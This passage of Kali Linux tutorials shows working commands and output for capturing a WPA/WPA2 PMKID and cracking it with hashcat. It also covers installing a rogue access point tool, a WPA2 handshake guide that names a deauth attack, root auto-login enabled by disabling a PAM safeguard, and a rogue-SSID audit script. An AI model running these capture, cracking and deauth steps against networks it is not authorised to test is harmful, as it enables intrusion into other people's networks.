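    essid = bytes.fromhex(essid_hex).decode("utf-8", errors="replace")
    return PmkidRecord(pmkid.lower(), _mac(ap), _mac(sta), essid,
                       passphrase if sep else None)


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat -a 3 mask generates.

    '?x' expands to a built-in charset, '??' is a literal '?', and any other
    character is a fixed literal (a factor of 1).
    """
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("mask ends with a lone '?'")
            token = mask[i + 1]
            if token != "?":
                if token not in CHARSET_SIZES:
                    raise ValueError(f"unsupported charset ?{token}")
                total *= CHARSET_SIZES[token]
            i += 2
        else:
            i += 1
    return total


def exhaust_days(mask: str, hashes_per_second: float = TUTORIAL_SPEED_HPS) -> float:
    """Days needed to try every candidate of the mask at the given rate."""
    return mask_keyspace(mask) / hashes_per_second / 86_400


if __name__ == "__main__":
    for line in (CRACKED_LINE, CAPTURED_LINE):
        rec = parse_16800(line)
        print(f"{rec.essid!r:16} AP {rec.ap_mac}  client {rec.sta_mac}  "
              f"passphrase={rec.passphrase}")
    for mask in ("?l?l?l?l?l?lt!", "?l?l?l?l?l?l?l?l", "?a?a?a?a?a?a?a?a?a?a"):
        print(f"{mask:24} {mask_keyspace(mask):>22,d} candidates  "
              f"{exhaust_days(mask):>14,.1f} days at 268.6 kH/s")
```

The decoded ESSID tells you which network a hash belongs to, which matters when triaging a capture. Eight lowercase letters are about 2.1e11 candidates, roughly nine days at this single GPU's rate, while ten characters from the full printable set are about 6e19, which is why the conclusion's advice on long, complex passphrases holds.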

Conclusion

Your home or office WiFi can be hacked if you are using a weak password; as always, a strong and complex password is still the best defense against an attacker.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Capture WPA/WPA2 PMKID Kali Linux 2018.4

In this guide I will use the new method to capture the WPA/WPA2 PMKID.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack you do not need to capture a full EAPOL 4-way handshake. The new attack is performed on the RSNIE (Robust Security Network Information Element) of a single EAPOL frame.”

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Install Dependencies And Tools

1.1 Install dependencies

sudo apt install libcurl4-openssl-dev libpcap0.8-dev zlib1g-dev libssl-dev

1.2 In order to use the new attack you need the following tools:

Download hcxdumptool, hcxtools and hashcat

sudo git clone https://github.com/ZerBea/hcxdumptool.git

sudo git clone https://github.com/ZerBea/hcxtools.git

sudo git clone https://github.com/hashcat/hashcat.git

1.3 Install hcxdumptool

cd hcxdumptool

1.3.a Build hcxdumptool

sudo make

1.3.b Start the installation

sudo make install

1.4.a Install hcxtools

cd ..
cd hcxtools/

1.4.b Build hcxtools

sudo make

1.4.c Start the installation

sudo make install

1.5.a Install hashcat

cd ..
cd hashcat

1.5.b Build hashcat

sudo make

1.5.c Start the installation

sudo make install

Step 2: Configure Network Card

2.1 Set network card in monitor mode

## Set interface down
sudo ip link set wlan0 down
 
## Set monitor mode
sudo iwconfig wlan0 mode monitor
 
## Set interface up
sudo ip link set wlan0 up

2.2 Confirm monitor mode (ALFA AWUS1900)

sudo iwconfig

root@GalaxyS9:~/hashcat# sudo iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~/hashcat# 

2.3 Kill the wpa_supplicant for wlan0

sudo wpa_cli terminate wlan0

root@GalaxyS9:~/hashcat# sudo wpa_cli terminate wlan0
Selected interface 'wlan0'
OK
root@GalaxyS9:~/hashcat# 

Step 3: Use Airodump-ng to sniff nearby networks

3.1 Open a new terminal and run airodump-ng to find your target BSSID

sudo airodump-ng --ivs wlan0

## Or dump the capture to a file
sudo airodump-ng wlan0 --ivs --wps -w /root/Desktop/Dump01 --output-format csv

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
84:C9:B2:6A:9E:90  -38       21        3    0   1  130  WPA2 CCMP   PSK  HonnyP01
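
The CSV dump written by `--output-format csv` above is also what a defender would use to spot a second BSSID advertising one of their own ESSIDs (an evil twin, the kind of rogue AP the WiFi-Pumpkin section later in these notes sets up) or an open network nearby. Below is an added Python example, not code from the tutorial or from aircrack-ng, that reads the access-point table of such a dump and checks it against an inventory of authorised APs. The CSV text is constructed to follow airodump-ng's CSV layout: its first row is the HonnyP01 access point from the output above, the other two rows and the AUTHORISED inventory are made up.

```python
"""Audit an airodump-ng CSV dump against an inventory of authorised APs.

Added example, not part of the tutorial or of aircrack-ng.  SAMPLE_CSV is
constructed in airodump-ng's CSV layout: its first row is the tutorial's
HonnyP01 access point, the other rows and the AUTHORISED inventory are made up.
"""
import csv
import io
from typing import Dict, List, Set

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
84:C9:B2:6A:9E:90, 2018-12-23 17:31:02, 2018-12-23 17:32:10,  1, 130, WPA2, CCMP, PSK, -38,       21,        3,   0.  0.  0.  0,   8, HonnyP01,
02:00:00:00:00:01, 2018-12-23 17:31:30, 2018-12-23 17:32:10,  6,  54, WPA2, CCMP, PSK, -61,       12,        0,   0.  0.  0.  0,   8, HonnyP01,
02:00:00:00:00:02, 2018-12-23 17:31:45, 2018-12-23 17:32:10, 11,  54, OPN ,     ,    , -70,        5,        0,   0.  0.  0.  0,  10, FreeCoffee,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Constructed inventory: ESSID -> BSSIDs that are allowed to advertise it.
AUTHORISED: Dict[str, Set[str]] = {"HonnyP01": {"84:C9:B2:6A:9E:90"}}


def parse_access_points(csv_text: str) -> List[Dict[str, str]]:
    """Return the access-point table of an airodump-ng CSV as a list of dicts.

    The file starts with a blank line, then the AP table, another blank line,
    and a client-station table with a different header; parsing stops at that
    second blank line.
    """
    ap_lines: List[str] = []
    for line in csv_text.splitlines():
        if not line.strip():
            if ap_lines:
                break        # blank line after the AP table: stations follow
            continue         # leading blank line
        ap_lines.append(line)
    reader = csv.DictReader(io.StringIO("\n".join(ap_lines)), skipinitialspace=True)
    rows: List[Dict[str, str]] = []
    for row in reader:
        rows.append({k.strip(): (v or "").strip()
                     for k, v in row.items() if k is not None})
    return rows


def audit(csv_text: str, authorised: Dict[str, Set[str]]) -> List[str]:
    """Flag BSSIDs impersonating an inventoried ESSID and networks without encryption."""
    findings: List[str] = []
    for ap in parse_access_points(csv_text):
        bssid, essid, privacy = ap["BSSID"], ap["ESSID"], ap["Privacy"]
        if essid in authorised and bssid not in authorised[essid]:
            findings.append(f"ROGUE-SSID {essid} advertised by unknown BSSID {bssid} "
                            f"on channel {ap['channel']}")
        if privacy in ("OPN", "WEP"):
            findings.append(f"WEAK-ENC {essid or '<hidden>'} ({bssid}) uses {privacy}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CSV, AUTHORISED):
        print(finding)
```

Run it against a real dump by reading the `-w` CSV file into `audit()` instead of `SAMPLE_CSV`; the station table that follows the AP table is ignored on purpose, since the check here is about who is advertising your network names.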

3.2 Open a new terminal, change to the hashcat directory and create a filter list file containing the target BSSID

## Open hashcat directory
cd hashcat/

## Create the filter list file containing the target's BSSID (without colons)
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 channel 1
## echo "BSSID" | sudo tee filter.txt
## (with "sudo echo ... > filter.txt" the redirect runs as the unprivileged shell, not as root)

echo "84C9B26A9E90" | sudo tee filter.txt

Step 4: Use Hcxdumptool To Catch PMKID From The Target

4.1 Launch hcxdumptool, write the capture to cap01.pcapng, use the filter list in filter mode 2 (only the listed BSSID) and stay on channel 1 (-c 1, the channel found for HonnyP01 in step 3.1)

sudo hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: e804100a061d
MAC ACCESS POINT.........: 18421de033b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64358
ANONCE...................: edcf48118ea4f0cfc15bf88ece2f38cad42b2e7b294f1db5d3288c7e477fb3b5

INFO: cha=3, rx=999, rx(dropped)=55, tx=32, powned=0, err=0

Let the tool run for at least 10 minutes. If the AP accepts the association request and supports sending a PMKID, you will see the message “FOUND PMKID”.

[16:25:48 - 011] 12acf1e762A4 -> 84C9B26A9E90 <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [ASSOCIATIONRESPONSE, SEQUENCE 1416]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [FOUND PMKID]

4.2 Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat

sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

root@GalaxyS9:~/hashcat# sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

reading from cap01.pcapng
                                                
summary:                                        
--------
file name....................: cap01.pcapng
file type....................: pcapng 1.0
file hardware information....: armv7l
file os information..........: Linux 4.14.79-v7+
file application information.: hcxdumptool 5.1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 2
beacons (with ESSID inside)..: 22
probe requests...............: 22
probe responses..............: 14
association requests.........: 1
association responses........: 1
reassociation responses......: 2
authentications (OPEN SYSTEM): 8
authentications (BROADCOM)...: 8
EAPOL packets................: 8
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)

1 PMKID(s) written to cap01.16800
root@GalaxyS9:~/hashcat#

4.3 Validate the hash

cat cap01.16800

root@GalaxyS9:~/hashcat# cat cap01.16800
4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553
root@GalaxyS9:~/hashcat# 

4.4 Crack the converted hash file with hashcat (mask attack: six lowercase letters followed by the literal “t!”)

./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 9ba69e3487f514214f1e0fa61ab78fb1*08863bdd2c95*a46cf...323464
Time.Started.....: Sun Dec 23 22:02:53 2018 (3 mins, 2 secs)
Time.Estimated...: Sun Dec 23 22:20:42 2018 (14 mins, 47 secs)
Guess.Mask.......: '?l?l?l?l?l?lt!' [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   289.5 kH/s (51.84ms) @ Accel:256 Loops:64 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 52101120/308915776 (16.87%)
Rejected.........: 0/52101120 (0.00%)
Restore.Point....: 52101120/308915776 (16.87%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3456-3520
Candidates.#1....: 'lwybcot!' -> 'yymytht!'
Hardware.Mon.#1..: Temp: 77c Fan: 55% Util: 99% Core:1822MHz Mem:4006MHz Bus:16

For a more detailed guide on how to use hashcat, see the guide on how to use hashcat in Windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install ALFA AWUS1900 Kali Linux 2018.4

Install ALFA AWUS1900 Kali Linux.

Alfa AWUS1900 is a quad-antenna 802.11ac Wi-Fi USB adapter boasting connection speeds of up to 1900 Mbps (1300 Mbps on 5 GHz + 600 Mbps on 2.4 GHz).

It is compatible with Microsoft Windows 7, 8/8.1 and Windows 10, and connects to the host by USB 3.

Its four transmit/four receive (4T4R) dual-band antennas allow use of both the 2.4 and 5 GHz bands on 802.11ac routers, for a combined maximum connection rate of 1900 Mbps.

The antennas can be detached and extended or upgraded.

Step 1: Update the system

1.1 Update and upgrade

sudo apt-get update && sudo apt-get upgrade

1.2 Update dependencies

sudo apt-get dist-upgrade -y

Step 2: Install Chipset Drivers

2.1 Before we begin to install the ALFA AWUS1900, confirm that the network card is connected to Kali Linux by listing the connected USB devices

sudo lsusb

root@GalaxyS9:~# sudo lsusb
Bus 004 Device 002: ID 0bda:8813 Realtek Semiconductor Corp. 
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 005: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 004: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 003: ID 0e0f:0008 VMware, Inc. 
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
root@GalaxyS9:~# 

2.2 Install the Realtek RTL8814AU chipset driver

sudo apt install realtek-rtl88xxau-dkms

2.3 Reboot and reconnect

sudo reboot

2.4 Confirm that the card is installed and running

sudo ifconfig

root@GalaxyS9:~# sudo ifconfig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.128  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 193  bytes 21265 (20.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 58  bytes 4527 (4.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 28  bytes 1596 (1.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1596 (1.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 5a:00:35:a3:b4:70  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~# 

sudo iwconfig

root@GalaxyS9:~# sudo iwconfig
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=18 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~# 

2.5 If the above doesn't work, install the packages below.

In the cloned git directory you will find a dkms installation script; execute the script to fix the installation.

sudo apt install dkms &&
sudo apt-get install bc &&
sudo apt-get install build-essential && 
sudo apt-get install linux-headers-$(uname -r)
sudo git clone https://github.com/aircrack-ng/rtl8812au

Step 3: Set The Card In Monitor Mode

3.1 You have to set the monitor mode manually on the AWUS036ACH & AWUS1900

## Set interface down
sudo ip link set wlan0 down

## Set monitor mode
sudo iwconfig wlan0 mode monitor

## Set interface up
sudo ip link set wlan0 up

3.2 Confirm monitor mode

sudo iwconfig

root@GalaxyS9:~# iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:5.3 GHz  Tx-Power=18 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~# 

3.3 Test the card by sniffing nearby networks

sudo airodump-ng wlan0

CH  7 ][ Elapsed: 1 min ][ 2018-12-23 17:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 84:C9:B2:6A:9E:90  -49        6        0    0   1  130  WPA2 CCMP   PSK  HonnyP01

root@GalaxyS9:~#

3.4 Change the adapter back to managed mode

## Set interface down
sudo ip link set wlan0 down

## Set managed mode
sudo iwconfig wlan0 mode managed

## Set interface up
sudo ip link set wlan0 up

Step 4: Optional Commands

4.1 Change TX power

sudo iwconfig wlan0 txpower 30

## OR

sudo iw wlan0 set txpower fixed 3000

4.2 Set channel manually

## Set channel 6, width 40 MHz: 
sudo iw wlan0 set channel 6 HT40-

## Set channel 149, width 80 MHz:
sudo iw wlan0 set freq 5745 80 5775

Conclusion

We have installed the ALFA AWUS1900 on Kali Linux and switched the network card to monitor mode.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Kali Linux Hacking Station On Raspberry Pi 3 Model B+

In this quick guide we are installing a Kali Linux hacking station on a Raspberry Pi 3 Model B+.

To access the hacking station we are enabling SSH and auto-login for lightdm; for remote desktop connection I am installing the Vino VNC server.

Last, we are installing and configuring WiFi-Pumpkin, a rogue access point platform.

Step 1: Download and Install Kali Linux Image

1.1 Download Kali Linux official Raspberry Pi image.

1.2 Extract the image from the zip file to a local folder.

1.3 Download and run Win32DiskImager or a similar application to write the image to the SD card.

1.4 Insert the SD card to the Raspberry Pi and power on the device.

Step 2: Connect to Kali Linux With SSH

2.1 Connect the Raspberry Pi to the LAN.

2.2 Scan your local network with Nmap to get the Raspberry’s IP address.

2.3 Start Putty and connect to the Kali Linux.

2.4 The default credentials are root for the login and toor for the password.

Step 3: Configure Kali Linux

3.1 Change the root user password.

sudo passwd root

root@kali:/# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:/#

3.2 First update installed packages.

sudo apt-get update -y

3.3 Next upgrade installed packages.

sudo apt-get upgrade -y

3.4 Finally upgrade dependencies.

sudo apt-get dist-upgrade -y

Step 4: Enable Auto login Lightdm

4.1 Display default manager service.

sudo cat /etc/X11/default-display-manager

root@kali:~# cat /etc/X11/default-display-manager
/usr/sbin/lightdm
root@kali:~# 

4.2 Edit configuration file for lightdm.

sudo nano /etc/lightdm/lightdm.conf

4.3 Delete the comment characters (“#”) and change the autologin user to be “root”.

    autologin-user=root
    autologin-user-timeout=0

Exit & Save

4.4 Edit the PAM configuration file for lightdm.

sudo nano /etc/pam.d/lightdm-autologin

4.5 Comment out the line below by prefixing it with “#”; it is the rule that excludes root from auto-login. Before and after:

# Allow access without authentication
auth      required pam_succeed_if.so user != root quiet_success

# Allow access without authentication
##auth      required pam_succeed_if.so user != root quiet_success

Exit & Save

4.6 Use the settings menu on the desktop to turn off the power savings options and lock screen options.

4.7 Reboot Kali Linux.

sudo reboot

4.8 Confirm that auto login is successful.

Step 5: Install Vino VNC server

5.1 Install the Vino VNC server.

sudo apt-get install vino -y 

5.2 Download and run the script below to configure the Vino server installation.

NOTE: Edit the script and change the password.

sudo git clone https://gist.github.com/jasonadsit/3a836c60f010bf655f82a99064341993

# After cloning, change into the directory and run the commands below
# (cd is a shell builtin, so "sudo cd" does nothing)

cd 3a836c60f010bf655f82a99064341993
sudo nano fix-kali-vnc.sh
sudo chmod +x fix-kali-vnc.sh
sudo ./fix-kali-vnc.sh

NOTE: The script will reboot the device when it is finished.

5.3 The installation script creates an autostart file for Vino, “vino-server.desktop”.

## You can display the file with the command below

sudo cat /root/.config/autostart/vino-server.desktop

5.4 List the listening sockets; Vino listens on TCP port 5900 on all interfaces (0.0.0.0 and ::).

sudo netstat -tupln

root@kali:~# sudo netstat -tupln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      454/sshd
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      555/vino-server
tcp6       0      0 :::22                   :::*                    LISTEN      454/sshd
tcp6       0      0 :::5900                 :::*                    LISTEN      555/vino-server
udp        0      0 0.0.0.0:68              0.0.0.0:*                           402/dhclient

5.5 To set the desktop resolution at startup, open the “boot” directory and edit the “config.txt” file.

cd /boot/

sudo nano config.txt

5.6 Uncomment the “framebuffer_width” and “framebuffer_height” parameters and set the resolution (1900 by 1024 here).

framebuffer_width=1900

## framebuffer_height
##     Console framebuffer height in pixels. Default is display height minus
##     overscan.
##
framebuffer_height=1024

Exit & Save

5.7 Reboot the device.

5.8 Confirm that the VNC server is working by connecting to the server with a VNC client.

Step 6: Configure WiFi Connection

6.1 Edit the network/interfaces configuration file.

sudo nano /etc/network/interfaces

# Add the lines below. (Remove quotes)

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid "YourNetworkName"
wpa-psk "YourPassword"

Exit & Save

6.2 Reboot once more.

sudo reboot

Optional 1: Install WiFi-Pumpkin Rogue AP

1.1 Install WiFi Pumpkin dependencies.

sudo apt install -y python-pip
sudo pip install service_identity
sudo pip install scapy_http
sudo apt install mitmproxy

1.2 Download WiFi-Pumpkin.

sudo git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

1.3 Open WiFi Pumpkin directory.

cd WiFi-Pumpkin/

1.4 Add permission to the installer file.

sudo chmod +x installer.sh

1.5 Run the installer script.

sudo ./installer.sh --install

1.6 Run the WiFi-Pumpkin application.

sudo wifi-pumpkin

Optional 2: Install Bully

https://github.com/aanarchyy/bully

2.1 Install Pixiewps and the build dependencies.

sudo apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps

2.2 Download Bully.

sudo git clone https://github.com/aanarchyy/bully

2.3 Build the application.

cd bully*/
cd src/
sudo make

2.4 Install bully.

sudo make install

Optional 3: Install Full Kali Linux Image

3.1 The process can take up to 6 hours and you need a 32 GB SD card.

sudo apt-get install kali-linux-full

Conclusion

We have installed a Kali Linux Hacking Station on Raspberry Pi 3 Model B+, enabled SSH and remote “desktop” connection.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Capture WPA2-PSK Handshake Kali Linux 2018.4

In this lab I will show how to capture the WPA2 4-way handshake using Kali Linux and how to crack the captured file with hashcat.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Enable Monitor Mode On a Supported WiFi Card

1.1.a Display wireless card





1.2 Enable monitoring mode





1.3 Display the new created virtual interface called wlan0mon





Step 2: Use Airodump To Capture Packets

2.1.a Start sniffing nearby traffic



Use the command below to sniff nearby traffic and save the captured packets into a file



2.1.b Let it run a while and close the capture; the file will contain the BSSID and the channel

Step 3: Capture The WPA2-PSK Handshake

3.1 Use airodump-ng to record the traffic from a specific access point, copy the BSSID and the channel number from the file that we created in the last step



3.2.a Open a new terminal window and launch a deauth attack with aireplay-ng



3.2.b Go back to terminal 1, stop the capture when you capture the wpa handshake



3.2.c Stop the deauth attack in terminal 2

3.3.a Confirm the captured handshake with aircrack-ng





Step 4: Convert The Captured Cap File

4.1 The captured .cap file needs to be converted to hccapx format before it can be cracked; the hashcat team has created a site where you can upload a WPA/WPA2 pcap capture file and convert it to a hashcat capture file.

Open https://hashcat.net/cap2hccapx/ and upload the file.

Please follow the guide on how to crack the formatted file using hashcat in Windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install Kismet Kali Linux 2018.4

Step 1: Update And Install Dependencies

1.1.a Upgrade / Update



1.2.a Install dependencies



1.2.b Install libusb



1.3.a Install Python add-ons



Step 2: Install And Configure Kismet

2.1.a Clone the repository and go to kismet directory





2.2.a Configure the installation



2.2.b Build Kismet



2.2.c Start the installation



Step 3: Start Kismet (ALFA AWUS1900)

3.1.a Put Your Wireless Card in Monitor Mode



3.1.b Start Kismet web UI





3.1.c Start Kismet with wlan0